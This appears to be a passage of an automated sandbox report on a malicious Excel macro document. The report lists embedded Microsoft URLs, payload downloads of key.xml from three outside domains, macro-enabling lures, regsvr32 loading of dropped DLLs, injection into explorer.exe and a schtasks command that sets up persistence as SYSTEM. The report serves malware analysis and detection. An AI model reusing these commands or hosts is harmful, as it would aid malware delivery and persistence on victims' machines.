                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://login.windows.local
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://management.azure.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://management.azure.com/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://messaging.office.com/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://ncus.contentsync.
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://ncus.pagecontentsync.
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://officeapps.live.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://onedrive.live.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://onedrive.live.com/embed?
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://osi.office.net
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://outlook.office.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://outlook.office.com/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://outlook.office365.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://outlook.office365.com/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://pages.store.office.com/review/query
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://powerlift.acompli.net
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://roaming.edog.
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://settings.outlook.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://shell.suite.office.com:1443
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://skyapi.live.net/Activity/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://staging.cortana.ai
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://store.office.cn/addinstemplate
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://store.office.com/addinstemplate
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://store.office.de/addinstemplate
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://tasks.office.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://web.microsoftstream.com/video/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://webshell.suite.office.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://wus2.contentsync.
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://wus2.pagecontentsync.
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://www.odwebp.svc.ms
                  Source: unknownDNS traffic detected: queries for: gillcart.com
                  Source: global trafficHTTP traffic detected: GET /Cdpmoyhr/key.xml HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gillcart.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /MeOlE9Xxd/key.xml HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: geit.inConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /9DPZqAfZdq5z/key.xml HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: mercanets.comConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 199.79.63.251:443 -> 192.168.2.3:49724 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 162.251.80.22:443 -> 192.168.2.3:49738 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 162.222.225.250:443 -> 192.168.2.3:49752 version: TLS 1.2

                  System Summary:

                  barindex
                  Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                  Source: Document image extraction number: 0Screenshot OCR: Enable Editing 0 PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless yo
                  Source: Document image extraction number: 0Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content om If you are using a m
                  Source: Document image extraction number: 1Screenshot OCR: Enable Editing (D PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
                  Source: Document image extraction number: 1Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content om If you are using a m
                  Office process drops PE fileShow sources
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\key[1].gifJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Datop\test1.test
                  Source: SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_100150009_2_10015000
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10016EF09_2_10016EF0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1001237E9_2_1001237E
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_100117909_2_10011790
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_100153BF9_2_100153BF
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00B0500017_2_00B05000
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00B06EF017_2_00B06EF0
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00B053BF17_2_00B053BF
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00B0179017_2_00B01790
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00B0237E17_2_00B0237E
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1000C702 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,9_2_1000C702
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1000CBB9 memset,GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,9_2_1000CBB9
                  Source: test1.test.17.drStatic PE information: No import functions for PE file found
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: SecuriteInfo.com.Exploit.Siggen3.20906.5188.xlsOLE indicator, VBA macros: true
                  Source: key[1].gif.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: test1.test.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: test1.test.17.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: SecuriteInfo.com.Exploit.Siggen3.20906.5188.xlsVirustotal: Detection: 15%
                  Source: SecuriteInfo.com.Exploit.Siggen3.20906.5188.xlsReversingLabs: Detection: 22%
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                  Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test
                  Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtwplfwnel /tr 'regsvr32.exe -s \'C:\Datop\test1.test\'' /SC ONCE /Z /ST 23:48 /ET 24:00
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.testJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.testJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.testJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtwplfwnel /tr 'regsvr32.exe -s \'C:\Datop\test1.test\'' /SC ONCE /Z /ST 23:48 /ET 24:00Jump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{AB7EB1E0-7A7B-49DE-9068-ABA03EDAFB4F} - OProcSessId.datJump to behavior
                  Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@12/4@3/3
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1000D565 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,9_2_1000D565
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: SecuriteInfo.com.Exploit.Siggen3.20906.5188.xlsOLE indicator, Workbook stream: true
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1000ABE5 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,9_2_1000ABE5
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6704:120:WilError_01
                  Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{D7C8E493-027B-48BC-9971-06DCE9DBCF24}
                  Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{F6BD3F44-6AC4-4334-A4C3-8B85DC2E1690}
                  Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{D7C8E493-027B-48BC-9971-06DCE9DBCF24}
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1000A55C FindResourceA,9_2_1000A55C
                  Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEAutomated click: OK
                  Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
                  Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
                  Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
                  Source: Binary string: amstream.pdb source: explorer.exe, 00000011.00000003.389173855.0000000004BA1000.00000004.00000001.sdmp
                  Source: Binary string: c:\Bed\gone\91\Receive\Strai\what.pdb source: explorer.exe, 00000011.00000003.389474880.0000000004BA1000.00000004.00000001.sdmp, key[1].gif.0.dr
                  Source: Binary string: amstream.pdbGCTL source: explorer.exe, 00000011.00000003.389173855.0000000004BA1000.00000004.00000001.sdmp
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10021257 push dword ptr [ecx+04h]; ret 9_2_100212C2
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1002671A push edx; retf 9_2_10026721
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10025F49 push ebx; retf 9_2_10025F4E
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1002414E push cs; retf 9_2_1002415A
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1002415B push edx; retf 9_2_1002415F
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_100213F8 push ds; iretd 9_2_10021410
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1006D881 push eax; iretd 9_2_1006D882
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00B0D4B6 push FFFFFF8Ah; iretd 17_2_00B0D50E
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00B0D485 push FFFFFF8Ah; iretd 17_2_00B0D50E
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00B0A00E push ebx; ret 17_2_00B0A00F
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00B09D5C push cs; iretd 17_2_00B09E32
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00B09E5E push cs; iretd 17_2_00B09E32
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00B0BB21 push esi; iretd 17_2_00B0BB26
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1000DFEF LoadLibraryA,GetProcAddress,9_2_1000DFEF
                  Source: key[1].gif.0.drStatic PE information: real checksum: 0x747d8 should be: 0x79f86
                  Source: test1.test.17.drStatic PE information: real checksum: 0x747d8 should be: 0x807ab
                  Source: test1.test.0.drStatic PE information: real checksum: 0x747d8 should be: 0x79f86

                  Persistence and Installation Behavior:

                  barindex
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\key[1].gifJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Datop\test1.test
                  Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Datop\test1.testJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\key[1].gifJump to dropped file
                  Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Datop\test1.testJump to dropped file

                  Boot Survival:

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                  Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtwplfwnel /tr 'regsvr32.exe -s \'C:\Datop\test1.test\'' /SC ONCE /Z /ST 23:48 /ET 24:00

                  Hooking and other Techniques for Hiding and Protection:

                  barindex
                  Overwrites code with unconditional jumps - possibly settings hooks in foreign processShow sources
                  Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 6888 base: DDF380 value: E9 48 69 D1 FF Jump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
